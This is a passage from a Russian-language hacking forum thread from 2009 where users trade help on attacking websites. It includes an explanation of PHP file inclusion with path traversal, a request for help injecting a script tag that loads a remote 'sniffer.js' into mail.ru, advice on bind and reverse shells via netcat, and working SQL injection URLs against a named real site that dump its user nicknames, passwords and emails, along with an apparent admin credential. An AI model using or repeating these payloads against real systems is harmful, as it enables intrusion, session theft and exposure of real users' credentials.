Ваши вопросы по уязвимостям.

Discussion in 'Уязвимости' started by darky, 4 Aug 2007.

Thread Status:
Not open for further replies.
  1. m0Hze

    m0Hze Well-Known Member

    Joined:
    1 Nov 2008
    Messages:
    266
    Likes Received:
    655
    Reputations:
    208
    Может перед тем,как становиться крутым хакером, стоит почитать о том как работают те или иные ЯП? И вообще в целом о http и интернете.Тогда такие вопросы пропадут сами собой.
     
  2. AFoST

    AFoST Elder - Старейшина

    Joined:
    28 May 2007
    Messages:
    588
    Likes Received:
    485
    Reputations:
    176
    php-include
    При таком коде include($_GET['page']); php инклудит файл с именем page в папке со скриптом(можно выйти из границ папки напр. ?page=../../file.php). Соответственно, исполняется php-код и возвращается результат на страницу.
    читалка файлов
    Чтобы увидеть php-код на странице, нужно искать другие реализации кода, направленные именно на чтение файла (напр. file(), fopen+fgets, идр.) + должен быть вывод на страницу.
     
    2 people like this.
  3. гаррет-тень

    Joined:
    21 Dec 2009
    Messages:
    67
    Likes Received:
    2
    Reputations:
    0
    поищу прям ща))) и все-таки?
     
  4. гаррет-тень

    Joined:
    21 Dec 2009
    Messages:
    67
    Likes Received:
    2
    Reputations:
    0
    AFoST, спасиб)
     
    1 person likes this.
  5. HuliGun777

    HuliGun777 New Member

    Joined:
    23 Dec 2009
    Messages:
    1
    Likes Received:
    0
    Reputations:
    0
    Здраствуйте можете помочь.Как обойти фильтр на mail.ru(он вроде заменяет точку и пробел на нижнее подчёркивание)Как должна выглядить этот скрипт
    %3CSCRIPT_type=text/javascript_src=http://httpz.ru/sniffer.js></SCRIPT>"
     
  6. a1ertso

    a1ertso New Member

    Joined:
    16 Dec 2009
    Messages:
    35
    Likes Received:
    0
    Reputations:
    0
    Пытался пробиндить машину,залил бинд, дал команду perl bind.pl . И ужеминут 15 никакого результата, просто грузится и все. Что с этим делать?
    Linux 2.6
     
  7. .:[melkiy]:.

    .:[melkiy]:. Elder - Старейшина

    Joined:
    25 Jan 2009
    Messages:
    355
    Likes Received:
    314
    Reputations:
    163
    делай бэк-коннект. информация есть на форуме.

    UPD:http://forum.antichat.ru/thread151993.html
     
  8. a1ertso

    a1ertso New Member

    Joined:
    16 Dec 2009
    Messages:
    35
    Likes Received:
    0
    Reputations:
    0
    пробовал, тоже самое... Только пишет
    так и весит
     
  9. .:[melkiy]:.

    .:[melkiy]:. Elder - Старейшина

    Joined:
    25 Jan 2009
    Messages:
    355
    Likes Received:
    314
    Reputations:
    163
    неткат у себя запустил?делай всё как в мануале, всё пашет(мб у тебя айпи динамический?)
     
  10. a1ertso

    a1ertso New Member

    Joined:
    16 Dec 2009
    Messages:
    35
    Likes Received:
    0
    Reputations:
    0
    неткат тоже не реагирует висит...
     
  11. .:[melkiy]:.

    .:[melkiy]:. Elder - Старейшина

    Joined:
    25 Jan 2009
    Messages:
    355
    Likes Received:
    314
    Reputations:
    163
    перепутал =(

    делай на дедик
     
  12. a1ertso

    a1ertso New Member

    Joined:
    16 Dec 2009
    Messages:
    35
    Likes Received:
    0
    Reputations:
    0
    Всмысле через промежуточный хост?
     
  13. .:[melkiy]:.

    .:[melkiy]:. Elder - Старейшина

    Joined:
    25 Jan 2009
    Messages:
    355
    Likes Received:
    314
    Reputations:
    163
    команды на шелле пашут хоть?)
     
  14. a1ertso

    a1ertso New Member

    Joined:
    16 Dec 2009
    Messages:
    35
    Likes Received:
    0
    Reputations:
    0
    да)
     
  15. .:[melkiy]:.

    .:[melkiy]:. Elder - Старейшина

    Joined:
    25 Jan 2009
    Messages:
    355
    Likes Received:
    314
    Reputations:
    163
    мб фейковая скуля? :eek:
     
  16. superboys

    superboys Elder - Старейшина

    Joined:
    1 Feb 2008
    Messages:
    61
    Likes Received:
    3
    Reputations:
    1
    http://logos.sakh.com/auth.php?name='&passw='
    ваши идеи?
    любой запрос игнорирует...
    Мыслей нет.
     
    1 person likes this.
  17. m0Hze

    m0Hze Well-Known Member

    Joined:
    1 Nov 2008
    Messages:
    266
    Likes Received:
    655
    Reputations:
    208
    эмм..а что там не так? сайт ясно говорит - что логин\пассвор инкорект.Невижу уязвимости,хоть глаз выколи.
    А вот если так,то уже кое что есть,раскрытия путей.
    Code:
    http://logos.sakh.com/auth.php?name[]=%27&passw[]=%27
    
    А вот и скуля
    Code:
    http://logos.sakh.com/?view=comments%27+union+select+version%28%29,2,3+--+
    
    Code:
    http://logos.sakh.com/?view=comments%27+union+select+COLUMN_NAME,2,3+FROM%20INFORMATION_SCHEMA.COLUMNS%20WHERE%20TABLE_NAME=%27logos_users%27%20+limit+2,1+--+
    
    Version: 5.0.82sp1-log
    Админка: Z:jncjcb
    Ничего интересного :(
    Даже обидно(
    Code:
    http://logos.sakh.com/?view=comments%27+union+select+concat_ws%280x3a,nick,password,email%29,2,3+FROM%20logos_users+--+
    
    Имей лимитом,если хочеш других пльзователей.привилегий на загрузку шела нет,а жаль.Хотя из админкиможно файлы править :D но там чтото недописано,и поэтому не получаеться)
     
    #10817 m0Hze, 26 Dec 2009
    Last edited: 26 Dec 2009
    1 person likes this.
  18. Root-access

    Root-access Elder - Старейшина

    Joined:
    18 Jun 2008
    Messages:
    193
    Likes Received:
    195
    Reputations:
    91

    Эм, нам откуда знать, упадёт он или нет? Смотря сколько человек посмотрит картинку на форуме и какой сервер у сайта.
     
  19. LokbatanLi

    LokbatanLi Member

    Joined:
    24 Aug 2009
    Messages:
    170
    Likes Received:
    20
    Reputations:
    -10
    nekak ne moqu nayti columns..

    pojalusta pomoqite..
     
  20. Ded MustD!e

    Ded MustD!e Banned

    Joined:
    23 Aug 2007
    Messages:
    392
    Likes Received:
    694
    Reputations:
    405
    а я никак не могу инъекцию там найти..

    мысль улавливаешь?
     
    1 person likes this.
Thread Status:
Not open for further replies.